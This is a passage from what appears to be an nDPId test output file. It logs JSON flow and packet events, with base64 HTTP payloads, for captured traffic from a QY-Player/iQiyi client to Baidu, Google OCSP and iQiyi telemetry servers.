sYXNoLXZlcnNpb246IDEyLDAsMCw3MA0KQWNjZXB0OiAqLyoNClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC80LjA7IFNMQ0MyOyAuTkVUIENMUiAyLjAuNTA3Mjc7IC5ORVQgQ0xSIDMuNS4zMDcyOTsgLk5FVCBDTFIgMy4wLjMwNzI5OyBNZWRpYSBDZW50ZXIgUEMgNi4wKS9RWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBjbGljay5obS5iYWlkdS5jb20NCkNvb2tpZTogSE1BQ0NPVU5UPTg4Q0M2OUIwNEM5RDYyOUE7IEJBSURVSUQ9MjEwMkRDNzUxRUQwREYzNkUzRDZDRjZDMjEwRkFCNzk6Rkc9MQ0KDQo="} 
-00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":997,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353138931,"flow_last_seen":1467353138931,"flow_idle_time":7440000,"flow_min_l4_payload_len":653,"flow_max_l4_payload_len":653,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":653,"midstream":1,"thread_ts_msec":1467353138931,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.112.49","src_port":50464,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"click.hm.baidu.com","url":"click.hm.baidu.com\/clk?53e25e33e064c657c06b558e5c3c33fd","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} -01370{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":998,"source":"pps.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1467353139050,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":744,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":744,"pkt_l4_len":710,"thread_ts_msec":1467353139050,"pkt":"ABxCjnAxTF4M6gNlCABFAALaH2hAAC0GDFd7fXAxwKhzCABQxSD7GtiHFHbNKVAYADhuxwAASFRUUC8xLjEgMzAyIEZvdW5kDQpMb2NhdGlvbjogaHR0cHM6Ly95b3V0dS5iZS85b3ZjSndDN0FFYw0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLSUQ9MDAwMDAwMDE1OWRhMTZiODU3NzYwODMyNWEwOGEzNzYwMDAwMDAyMDM1MzM2NTMyMzU2NTMzMzM2NTMwMzYzNDYzMzYzNTM3NjMzMDM2NjIzNTM1Mzg2NTM1NjMzMzYzMzMzMzY2NjQwMDAwMDAwODc5NmY3NTc0NzUyZTYyNjU7IFBhdGg9LzsgRG9tYWluPWhtLmJhaWR1LmNvbTsgRXhwaXJlcz1GcmksIDAxIEp1bCAyMDE2IDA2OjM1OjM4IEdNVA0KU2V0LUNvb2tpZTogSF9NS1RfQ0xLTE9HPTAwMDAwMDAxNTlkYTE2Yjg1Nzc2MDgzMjVhMDhhMzc2MDAwMDAwMjAzNTMzNjUzMjM1NjUzMzMzNjUzMDM2MzQ2MzM2MzUzNzYzMzAzNjYyMzUzNTM4NjUzNTYzMzM2MzMzMzM2NjY0MDAwMDAwMDg3OTZmN
zU3NDc1MmU2MjY1OyBQYXRoPS87IERvbWFpbj1obS5iYWlkdS5jb207IEV4cGlyZXM9RnJpLCAwMSBKdWwgMjAxNiAwNjozNTozOCBHTVQNClAzUDogQ1A9IkNVUmEgQURNYSBERVZhIFBTQW8gUFNEbyBPVVIgQlVTIFVOSSBQVVIgSU5UIERFTSBTVEEgUFJFIENPTSBOQVYgT1RDIE5PSSBEU1AgQ09SIg0KQ29ubmVjdGlvbjogY2xvc2UNCkNvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM4IEdNVA0KU2VydmVyOiBhcGFjaGUNCg0K"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1467353139305,"pkt":"TF4M6gNlABxCjnAxCABFAAEKA4dAAIAGQVvAqHMIy0K2GMUiAFDWCs3i1IWCxVAYAQQdEwAAR0VUIC9vY3NwL01Fa3dSekJGTUVNd1FUQUpCZ1VyRGdNQ0dnVUFCQlR5NEdyNWhZb2RqWENiU1JramVxbTFHaWglMkJaQVFVU3QwR0ZodTg5bWkxZHZXQnRydGlHcnBhZ1M4Q0NFWXJGWGtxMnVneiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KQWNjZXB0OiAqLyoNClVzZXItQWdlbnQ6IE1pY3Jvc29mdC1DcnlwdG9BUEkvNi4xDQpIb3N0OiBjbGllbnRzMS5nb29nbGUuY29tDQoNCg=="} 
-00892{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":999,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139305,"flow_last_seen":1467353139305,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":226,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":226,"midstream":1,"thread_ts_msec":1467353139305,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {"hostname":"clients1.google.com","url":"clients1.google.com\/ocsp\/MEkwRzBFMEMwQTAJBgUrDgMCGgUABBTy4Gr5hYodjXCbSRkjeqm1Gih%2BZAQUSt0GFhu89mi1dvWBtrtiGrpagS8CCEYrFXkq2ugz","code":0,"content_type":"","user_agent":"Microsoft-CryptoAPI\/6.1"}} -01465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1000,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1467353139309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":813,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":813,"pkt_l4_len":779,"thread_ts_msec":1467353139309,"pkt":"ABxCjnAxTF4M6gNlCABFAAMfaWMAAD0GXGrLQrYYwKhzCABQxSLUhYLF1grOxFAYAO2vKAAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jc3AtcmVzcG9uc2UNCkRhdGU6IFR1ZSwgMjggSnVuIDIwMTYgMTc6MzQ6NDkgR01UDQpFeHBpcmVzOiBTYXQsIDAyIEp1bCAyMDE2IDE3OjM0OjQ5IEdNVA0KU2VydmVyOiBvY3NwX3Jlc3BvbmRlcg0KQ29udGVudC1MZW5ndGg6IDQ2Mw0KWC1YU1MtUHJvdGVjdGlvbjogMTsgbW9kZT1ibG9jaw0KWC1GcmFtZS1PcHRpb25zOiBTQU1FT1JJR0lODQpBZ2U6IDIxNzg0OQ0KQ2FjaGUtQ29udHJvbDogcHVibGljLCBtYXgtYWdlPTM0NTYwMA0KDQowggHLCgEAoIIBxDCCAcAGCSsGAQUFBzABAQSCAbEwggGtMIGWohYEFErdBhYbvPZotXb1gba7Yhq6WoEvGA8yMDE2MDYyODA3MDAxN1owazBpMEEwCQYFKw4DAhoFAAQU8uBq+YWKHY1wm0kZI3qptRoofmQEFErdBhYbvPZotXb1gba7Yhq6WoEvAghGKxV5KtroM4AAGA8yMDE2MDYyODA3MDAxN1qgERgPMjAxNjA3MDUwNzAwMTdaMA0G
CSqGSIb3DQEBCwUAA4IBAQBKs877cfA5B2KGhwFSvIyUBYVxkUFjApJpIKog7zezUT4uRPAvbjktL\/Ds15nk8Y2Znhsf4SdVmf8GlloCQ6IXimfBklwRGn8\/72t77ZQLcabmXBFNBqyfqmRrW1O7lFh1alLxLnbN6PNKIPNv7dkTJVq4NRpJC1H3sykeA3XbH5EEaxhdvWFd1bsvybTiEgn7Bn5bpdXlExvoxRYuc7MLXQAUHRWSGKZpv+UniRokZRHgZy2GbGkQE8sf0PVCXrNjm4qsIXnQvqrF2J2xxFQ5x1wzU7J9l9Av+bPvuQI2mdLqvQskYq3tOxhJ6prFG9fcqt4lJS5E11mkG9tPXiAq"} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01219{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":629,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":629,"pkt_l4_len":595,"thread_ts_msec":1467353139505,"pkt":"TF4M6gNlABxCjnAxCABFAAJnA5RAAIAG6ATAqHMIymwO28UjAFBUZatTb7o85VAYAQQGIwAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRzdGFydCZzdGFydHRtPTEwOTcmcmVzZXQ9MSZyYT0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMTkmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTA
yDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01155{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1001,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139505,"flow_last_seen":1467353139505,"flow_idle_time":7440000,"flow_min_l4_payload_len":575,"flow_max_l4_payload_len":575,"flow_tot_l4_payload_len":575,"flow_avg_l4_payload_len":575,"midstream":1,"thread_ts_msec":1467353139505,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50467,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adstart&starttm=1097&reset=1&ra=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353119&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1002,"source":"pps.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1467353139595,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139595,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5uuZAADMGf2DKbA7bwKhzCABQxSNvujzlVGWtklAYADcmHAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":573,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":573,"pkt_l4_len":539,"thread_ts_msec":1467353139627,"pkt":"TF4M6gNlABxCjnAxCABFAAIvA51AAIAG6DPAqHMIymwO28UlAFD7uSUWcC90rlAYAQQTNwAAR0VUIC9jb3JlP3Q9NSZhPTImcmE9MSZwZj0yMDEmcD0xMSZwMT0xMTQmcDI9MzAwMCZzZGt0cD0xJmMxPTMxJnI9NDc5NTMxMDAwJmFpZD0xODA5MzIzMDEmdT1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZwdT0mb3M9V2luZG93cyUyMDcmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxMzkmaXNsb2NhbD0wJmFzPTAzMTFjNWEwZDU1OTYwNjNkYjU5NDRiZDc2YjZjYmZmJnZlPWIxZjkwZjhkYTZmZTAyNThkMTM2MTZhODA3MGNiOTk3JnBlPSZ2ZnJtPSZjaGw9JmhjZG52PTEwLjAuMC4yOTMmdHBjZD0wJmlzZHJtPTEmaHQ9MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
-01099{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1003,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139627,"flow_last_seen":1467353139627,"flow_idle_time":7440000,"flow_min_l4_payload_len":519,"flow_max_l4_payload_len":519,"flow_tot_l4_payload_len":519,"flow_avg_l4_payload_len":519,"midstream":1,"thread_ts_msec":1467353139627,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50469,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=5&a=2&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353139&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":424,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":424,"pkt_l4_len":390,"thread_ts_msec":1467353139662,"pkt":"TF4M6gNlABxCjnAxCABFAAGaA59AAIAG6LXAqHMIymwO7MUmAFBtzkRVA7NFyFAYAQQzoQAAR0VUIC9iP3Q9NSZwZj0yMDEmcD0xMSZwMT0xMTQmYT0zNCZjdD1vbmNsaWNrJnR5cGU9cGMmYXM9JmNsdD1wY19wbGF5X3BsYXllcl9jbGljayZtdj01LjIuMTUuMjI0MCZwdT0mcm49MEZFMTcyRUM0NEM0NEI4NkFFRURFNTRBQTAwNTQxQzQ1NzQwNiZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnY9Mi4wLjEwMi4zMDE0NyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1004,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139662,"flow_last_seen":1467353139662,"flow_idle_time":7440000,"flow_min_l4_payload_len":370,"flow_max_l4_payload_len":370,"flow_tot_l4_payload_len":370,"flow_avg_l4_payload_len":370,"midstream":1,"thread_ts_msec":1467353139662,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50470,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=5&pf=201&p=11&p1=114&a=34&ct=onclick&type=pc&as=&clt=pc_play_player_click&mv=5.2.15.2240&pu=&rn=0FE172EC44C44B86AEEDE54AA00541C457406&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=2.0.102.30147","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 
-00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1005,"source":"pps.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1467353139771,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353139771,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0y0pAADMGbvDKbA7swKhzCABQxSYDs0XIbc5Fx1AYAB\/3XQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} -00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1006,"source":"pps.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1467353139779,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353139779,"pkt":"ABxCjnAxTF4M6gNlCABFAAC58h9AADMGSCfKbA7bwKhzCABQxSVwL3Su+7knHVAYADbM\/QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjM5IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":952,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":952,"pkt_l4_len":918,"thread_ts_msec":1467353139819,"pkt":"TF4M6gNlABxCjnAxCABFAAOqA7FAAIAG5pPAqHMIymwO7MUnAFCB65R9kZemalAYQTdERQAAR0VUIC9jcDIuZ2lmP2E9NGUzYWU0MTVhNTg0NzQ4YWM5YWEzMTYyOGYzOWQxZTgmYWk9MXx8NzEwMDAwMDF8fDUwMDAwMDA4NTg4NzR8fDUwMDAwMDA5Mjc1NTh8fHJvbGwmYXM9JmF2PTQuMTAuMDA0JmI9MTgwOTMyMzAxJmM9MzEmY3Q9JmQ9MjE3NSZkaT0mZHA9JmU9YzQ4ODllNjRhZDlkOWVlYjlmZjQzODkxMDg1MGM0NDImZWM9JmVtPSZmaT0mZz0wJmw9TVRFNExqRTJNeTQ0TGprdyZtaz0mbnc9Jm9kPSZvaT0mcD10JnBwPSZyYz0tMSZyZD05MiZyaT0mcz0xNDY3MzUzMTM4MDQzJnNoPSZzcT0mc3c9JnQ9cyZ1PTBfYWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj00Nzk1MzEwMDAmdnY9NS4yLjE1LjIyNDAmeD0meT1xY18xMDAwMDFfMTAwMTQwIEhUVFAvMS4xDQpBY2NlcHQtTGFuZ3VhZ2U6IHpoLUNODQpSZWZlcmVyOiBodHRwOi8vd3d3LmlxaXlpLmNvbS9jb21tb24vZmxhc2hwbGF5ZXIvMjAxNDA5MjQvTWFpblBsYXllcl81XzJfM19jM18yXzFfNi5zd2YNCnF5aWQ6IGFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDogXzIwMTINCnF5cGxhdGZvcm06IDAtMg0KeC1mbGFzaC12ZXJzaW9uOiAxMiwwLDAsNzANCkFjY2VwdDogKi8qDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS80LjAgKGNvbXBhdGlibGU7IE1TSUUgOC4wOyBXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNC4wOyBTTENDMjsgLk5FVCBDTFIgMi4wLjUwNzI3OyAuTkVUIENMUiAzLjUuMzA3Mjk7IC5ORVQgQ0xSIDMuMC4zMDcyOTsgTWVkaWEgQ2VudGVyIFBDIDYuMCkvUVktUGxheWVyLVdpbmRvd3MvMi4wLjEwMg0KSG9zdDogbXNnLjcxLmFtDQoNCg=="} 
-01302{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1007,"source":"pps.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353139819,"flow_last_seen":1467353139819,"flow_idle_time":7440000,"flow_min_l4_payload_len":898,"flow_max_l4_payload_len":898,"flow_tot_l4_payload_len":898,"flow_avg_l4_payload_len":898,"midstream":1,"thread_ts_msec":1467353139819,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50471,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=1||71000001||5000000858874||5000000927558||roll&as=&av=4.10.004&b=180932301&c=31&ct=&d=2175&di=&dp=&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=&oi=&p=t&pp=&rc=-1&rd=92&ri=&s=1467353138043&sh=&sq=&sw=&t=s&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 